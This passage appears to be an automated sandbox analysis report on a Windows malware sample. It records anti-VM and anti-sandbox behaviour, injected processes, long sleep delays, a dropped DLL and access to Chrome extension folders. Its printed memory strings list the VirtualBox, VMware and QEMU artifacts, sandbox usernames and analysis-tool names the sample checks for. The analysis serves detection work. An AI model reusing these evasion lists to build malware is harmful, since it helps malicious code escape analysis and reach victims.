Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 00000013.00000003.383001700.0000000003666000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.467467655.00000000035B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fontview.exe PID: 4020, type: MEMORYSTR

Query firmware table information (likely to detect VMs)

Source: C:\Windows\SysWOW64\fontview.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontview.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontview.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontview.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontview.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontview.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontview.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontview.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontview.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontview.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontview.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontview.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontview.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontview.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontview.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontview.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontview.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontview.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontview.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontview.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontview.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontview.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontview.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\fontview.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 226F.exe, 00000010.00000002.480422025.0000000002F20000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: DLLREGISTERSERVERWKANIMHDMAWWV3SZQXYVBUPQC78ZCSCYZEXUSDVMOYWFSOSYSANDBOXK5IQR5XKKHFI0OIXFMGQKSOZVXBFCBSXP0CQKIPRNCYQHM3WLLXT6CDBBS26ESKV7845SWCP2EBLGWHVHDTWSOGZ9U9CGZZSDH2UM9TZTCXYZLXSGKNIDIWISTXFFJPSHTTP://GEKJEGOUDN6I5FBCES.JOMF6MTOBKL32EAI1QWQXSXPNFYV2SMICROSOFT BASIC DISPLAY ADAPTERAPXALPLEWOMRTXOQBIS5VVQOZJTDWDYPDWOJSVZO2QACQSIOYXZAFZ3U9IKX2BQN6EZZOXJP5PSUZKQMTGHZQELR5EG7GRIMERCTFOUNCFE4BGUM7H3R60PJIOCTMJ0M%LS\%D.DLLQU673JXMPB9XS6BLT0XDS1ALT0EJ5HLLAKOWFXNBJFIIOLTKI8WPBYDTNFYR40QJP9YSA5NKHRYBKS7IXE6TWUFX1EVDSUKHNIFAX TEGAWO NIP XEHN9YXFM4WGP9YUO5HXPMC4XQ1BZLDJLNGVBOXTRAY.EXEVMWARETRAY.EXEWECHAT.EXEVMWAREUSER.EXEFIDDLER.EXEPROCESSHACKER.EXEQQ.EXEPROCEXP.EXERDPCLIP.EXEWIRESHARK.EXEKAWEXI GEQUECI BOVOJ.EXEVBOXSERVICE.EXEVGAUTHSERVICE.EXEVMTOOLSD.EXEPRL_CC.EXEHTTPDEBUGGERUI.EXEHTTPANALYZERSTDV7.EXEPROCEXP64.EXE9VCQBULREEOHDRQECLOUDSAFELINEYQ7T94QZPUDEORTE80URPBYHQ3908APEYCDDGGZJIPRJTKOE8J4WDLLBX1APOW9EVBZ1UO2T2UBMGTUDBSQDYJSBALF5CGVCSFIMBSIBECUOLZPCIK2VP28IR0VTY4TBDYVLFRSD5XNE93CYIIGVV5KBWQ4W2ROU3OQVPIRDLVGRVMVTMQRP5J7SUNTW6WJSCCDMAYGHINOZWAXRSZKCI5FN6D9Y9HJRZHIX2JJ5NDQDFLBQ7GSN9CORX41KRUAQXIHNEOIQB1VONHHQFPG6N3LIJPAESKGQBMH2WFPZKMIH3JPNW2WWL4QOWW0SAVLN7QPQACULBYLOPUMLDJFMGRXYRKQKOVNJKRD4PQP2PQ8FNC7JABGGRSW4W0K7VSSICQYE9JT8N0NVH1MITQSNOGZQBXMIJYLHV2DLCZJ486OVC7EHTPLWZ4NT1DG4JSQGYZCQBMR6MBLZRXJGOXTXCYOA7FBPN0EGH7EX8DG8NSYCSAOGD5G0NV7R0LVA09KGCAWTJO5TB2I2LHAGZRMZ4T0EPASO079GSLJNUY5E4DLIUTNFLXFUZSNAEVRRIGWCHIYUGQ9HHPQODBLBIAQMME3ZWAAGKEJB4GPXYSRTR5EFN43BBTXITK2KKFOG8JCARLOY8GS3RRVRRJNAUFJSZGAKWZM2DEQ8OCWPZQ6O4RIWMRY77FLBKVUSFEYWTPB6Y2CTOYPQLWYAQAY5DNDXG1BSVPPP4JQ5WXP1OQ3Y3DHBZRC5X4KW1CN7YJDB9J450JE0S2RDQL7GXWP4ZKMA4WMYVM2YZR24ZUIL8P9X5RU6F5F2HM4YAEQ4STV1PKJ0
Source: fontview.exe, 00000013.00000003.383001700.0000000003666000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WQLRANDOMRANDOM NAME%THISISANINVALIDFILENAME?[]<>@\;!-{}#:/~%%THISISANINVALIDENVIRONMENTVARIABLENAME?[]<>@\;!-{}#:/~%CMDVRT32.DLLCMDVRT64.DLLWPESPY.DLLVMCHECK.DLLPSTOREC.DLLDIR_WATCH.DLLAPI_LOG.DLLDBGHELP.DLLSBIEDLL.DLLSNXHK.DLLAVGHOOKA.DLLAVGHOOKX.DLLTESTAPP.EXEMYAPP.EXEKLAVME.EXETEST.EXEMALWARE.EXESANDBOX.EXEBOT.EXESAMPLE.EXEJOHN DOEVIRUSTEST USERMALTESTMALWARESAND BOXUSERTIMMYPETER WILSONMILOZSMILLERJOHNSONIT-ADMINHONG LEEHAPUBWSEMILYSANDBOXCURRENTUSERTEQUILABOOMBOOMFORTINETWIN7-TRAPSMUELLER-PCJOHN-PCHANSPETER-PC7SILVIASANDBOXC:\A\FOOBAR.GIFC:\A\FOOBAR.DOCC:\A\FOOBAR.BMPC:\123\EMAIL.DOCXC:\123\EMAIL.DOCC:\EMAIL.HTMC:\EMAIL.DOCC:\LOADDLL.EXEC:\TAKE_SCREENSHOT.PS1JOHNKLONE_X64-PCSYSTEMITADMINSWSCWILBERNUMBEROFCORESSELECT * FROM WIN32_PROCESSORVIRTUALQEMUVMWAREVBOXVBOXVBOXVBOXPARALLELS HVPRL HYPERV XENVMMXENVMMVMWAREVMWAREMICROSOFT HVKVMKVMKVMA M IVIRTUALXEN0PARALLELSVMWARESERIALNUMBERSELECT * FROM WIN32_BIOSHVM DOMUVIRTUALBOXMODELSELECT * FROM WIN32_COMPUTERSYSTEMQEMUINNOTEK GMBHMANUFACTURERPROCESSORIDVMWXENVIRTIOSYSTEM\CURRENTCONTROLSET\ENUM\SCSISYSTEM\CURRENTCONTROLSET\ENUM\IDESELECT * FROM CIM_PHYSICALCONNECTOR06/23/99SYSTEMBIOSDATEVIRTUALBOXVIDEOBIOSVERSIONSYSTEMBIOSVERSIONIDENTIFIERHARDWARE\DEVICEMAP\SCSI\SCSI PORT 0\SCSI BUS 0\TARGET ID 0\LOGICAL UNIT ID 0HARDWARE\DESCRIPTION\SYSTEMVBOXSYSTEM\CONTROLSET001\SERVICES\VBOXVIDEOSYSTEM\CONTROLSET001\SERVICES\VBOXSFSYSTEM\CONTROLSET001\SERVICES\VBOXSERVICESYSTEM\CONTROLSET001\SERVICES\VBOXMOUSESYSTEM\CONTROLSET001\SERVICES\VBOXGUESTSOFTWARE\ORACLE\VIRTUALBOX GUEST ADDITIONSHARDWARE\ACPI\RSDT\VBOX__HARDWARE\ACPI\FADT\VBOX__HARDWARE\ACPI\DSDT\VBOX__SYSTEM32\VBOXCONTROL.EXESYSTEM32\VBOXTRAY.EXESYSTEM32\VBOXSERVICE.EXESYSTEM32\VBOXOGLPASSTHROUGHSPU.DLLSYSTEM32\VBOXOGLPACKSPU.DLLSYSTEM32\VBOXOGLFEEDBACKSPU.DLLSYSTEM32\VBOXOGLERRORSPU.DLLSYSTEM32\VBOXOGLCRUTIL.DLLSYSTEM32\VBOXOGLARRAYSPU.DLLSYSTEM32\VBOXOGL.DLLSYSTEM32\VBOXMRXNP.DLLSYSTEM32\VBOXHOOK.DLLSYSTEM32\VBOXDISP.DLLSYSTEM32\DRIVERS\VBOXVIDEO.SYSSYSTEM32\DRIVERS\VBOXSF.SYSSYSTEM32\DRIVERS\VBOXGUEST.SYSSYSTEM32\DRIVERS\VBOXMOUSE.SYS%PROGRAMW6432%\\.\PIPE\VBOXTRAYIPC\\.\VBOXTRAYIPC\\.\PIPE\VBOXMINIRDDN\\.\VBOXGUEST\\.\VBOXMINIRDRDNVBOXTRAYTOOLWNDVBOXTRAYTOOLWNDCLASSVIRTUALBOX SHARED FOLDERSVBOXTRAY.EXEVBOXSERVICE.EXEPCI\VEN_80EE&DEV_CAFEDEVICEIDSELECT * FROM WIN32_PNPENTITYOPENHCD82371SB82441FX82801FBNAMEVEN_VBOXPNPDEVICEIDCAPTIONSELECT * FROM WIN32_PNPDEVICEPNP_BUS_0PCI_BUS_0ACPIBUS_BUS_0SELECT * FROM WIN32_BUSORACLE CORPORATIONPRODUCTSELECT * FROM WIN32_BASEBOARDSOURCESSYSTEMFILENAMESELECT * FROM WIN32_NTEVENTLOGFILEVBOXWDDMVBOXVIDEOW8VBOXVIDEOVBOXVBOXVIRTUALBOXSYSTEMPRODUCTNAMESYSTEMMANUFACTURERHARDWARE\DEVICEMAP\SCSI\SCSI PORT 2\SCSI BUS 0\TARGET ID 0\LOGICAL UNIT ID 0HARDWARE\DEVICEMAP\SCSI\SCSI PORT 1\SCSI BUS 0\TARGET ID 0\LOGICAL UNIT ID 0SYSTEM\CONTROLSET001\CONTROL\SYSTEMINFORMATIONVMWARESOFTWARE\VMWARE, INC.\VMWARE TOOLSVMACTHLP.EXEVGAUTHSERVICE.EXEVMWAREUSER.EXEVMWARETRAY.EXEVMTOOLSD.EXEVMWAREVMWAREVDSERVICE.EXEVDAGENT.EXEQEMU-GA.E
Source: fontview.exe, 00000013.00000003.383001700.0000000003666000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000002.467467655.00000000035B0000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000002.467647145.0000000003638000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK.DLL

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Windows\SysWOW64\fontview.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_PhysicalConnector

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\fontview.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity
Source: C:\Windows\SysWOW64\fontview.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\dbjigst	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\dbjigst	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\dbjigst	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\dbjigst	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\dbjigst	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\dbjigst	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Windows\SysWOW64\fontview.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\fontview.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\SysWOW64\fontview.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard

Source: C:\Windows\explorer.exe TID: 4536	Thread sleep count: 405 > 30
Source: C:\Windows\explorer.exe TID: 4780	Thread sleep count: 944 > 30
Source: C:\Windows\explorer.exe TID: 4780	Thread sleep time: -94400s >= -30000s
Source: C:\Windows\explorer.exe TID: 3596	Thread sleep count: 529 > 30
Source: C:\Windows\explorer.exe TID: 3596	Thread sleep time: -52900s >= -30000s
Source: C:\Windows\explorer.exe TID: 3544	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\explorer.exe TID: 3184	Thread sleep count: 531 > 30
Source: C:\Windows\explorer.exe TID: 2388	Thread sleep count: 827 > 30
Source: C:\Windows\explorer.exe TID: 2388	Thread sleep time: -82700s >= -30000s
Source: C:\Windows\explorer.exe TID: 2336	Thread sleep count: 410 > 30
Source: C:\Windows\explorer.exe TID: 2336	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe TID: 5336	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe TID: 1020	Thread sleep count: 6079 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe TID: 2008	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 5556	Thread sleep count: 1744 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1076	Thread sleep time: -11068046444225724s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\336E.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 405
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 944
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 529
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 531
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 827
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 410
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 876
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Window / User API: threadDelayed 6079
Source: C:\Windows\System32\dllhost.exe	Window / User API: threadDelayed 1744
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9522

Source: C:\Windows\SysWOW64\fontview.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\SysWOW64\fontview.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\226F.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5898187.dll

Jump to dropped file

Source: C:\Windows\System32\rundll32.exe	Registry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Windows\SysWOW64\fontview.exe	Memory allocated: 55B0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\SysWOW64\fontview.exe	Memory allocated: 55B0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\SysWOW64\fontview.exe	Memory allocated: 55B0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\SysWOW64\fontview.exe	Memory allocated: 55B0000 memory commit \| memory reserve \| memory write watch

Source: C:\Windows\SysWOW64\fontview.exe	File opened / queried: VBoxGuest
Source: C:\Windows\SysWOW64\fontview.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
Source: C:\Windows\SysWOW64\fontview.exe	File opened / queried: C:\Windows\SysWOW64\vboxservice.exe
Source: C:\Windows\SysWOW64\fontview.exe	File opened / queried: C:\Windows\SysWOW64\vboxtray.exe
Source: C:\Windows\SysWOW64\fontview.exe	File opened / queried: C:\Windows\SysWOW64\drivers\VBoxMouse.sys
Source: C:\Windows\SysWOW64\fontview.exe	File opened / queried: VBoxTrayIPC
Source: C:\Windows\SysWOW64\fontview.exe	File opened / queried: C:\Windows\SysWOW64\drivers\VBoxSF.sys
Source: C:\Windows\SysWOW64\fontview.exe	File opened / queried: C:\Windows\SysWOW64\vboxhook.dll
Source: C:\Windows\SysWOW64\fontview.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosDate
Source: C:\Windows\SysWOW64\fontview.exe	File opened / queried: \pipe\VBoxTrayIPC
Source: C:\Windows\SysWOW64\fontview.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Windows\SysWOW64\fontview.exe	File opened / queried: C:\Windows\SysWOW64\drivers\VBoxVideo.sys
Source: C:\Windows\SysWOW64\fontview.exe	File opened / queried: VBoxMiniRdrDN
Source: C:\Windows\SysWOW64\fontview.exe	File opened / queried: C:\Windows\SysWOW64\drivers\VBoxGuest.sys
Source: C:\Windows\SysWOW64\fontview.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\fontview.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\fontview.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

Source: fontview.exe, 00000013.00000002.467467655.00000000035B0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: VMware
Source: fontview.exe, 00000013.00000002.467740836.0000000003698000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.445080033.0000000003698000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HMicrosoft-Windows-Hyper-V-Hypervisor
Source: 226F.exe, 00000010.00000002.480422025.0000000002F20000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: DllRegisterServerwkANimhDMAwWV3szQXyvBuPQC78zCscyzexusDvMOYwfSOSysandboxk5iQr5xKkhFi0oixFMGqksOZvxBFcBSxp0cQkIPrNCyQHM3wLlxT6Cdbbs26eSkv7845SwCp2eblGwhvHDTWSogz9U9CgzzsDh2um9tzTcXYzLxsGKNiDiwisTXFFjpshttp://gEKjeGOUdN6i5fBcEs.jOmF6MtoBKl32eAI1QwqxSxpNFyV2sMicrosoft Basic Display AdapterapxALpLEWoMRTxoqbiS5VVQOzJTDWDypDWoJSVZo2QACQsioYxzAfz3u9IKX2BQn6EzzoxJp5PsUZkqmTghzqELr5eG7GRimerCTfOUnCFE4bGUm7h3r60PJIoCTMJ0m%lS\%d.dllQU673JXmPb9xS6blT0XDs1ALT0EJ5hLlaKOwfxnBjFiiOltkI8wpbYDtnFYR40qjP9YSa5NKhRybkS7ixE6tWUfx1eVdsUkhnifax tegawo nip xehN9YxfM4WgP9Yuo5hXPmc4XQ1BZlDjlngvboxtray.exevmwaretray.exewechat.exevmwareuser.exeFiddler.exeprocesshacker.exeqq.exeprocexp.exerdpclip.exeWireshark.exeKawexi gequeci 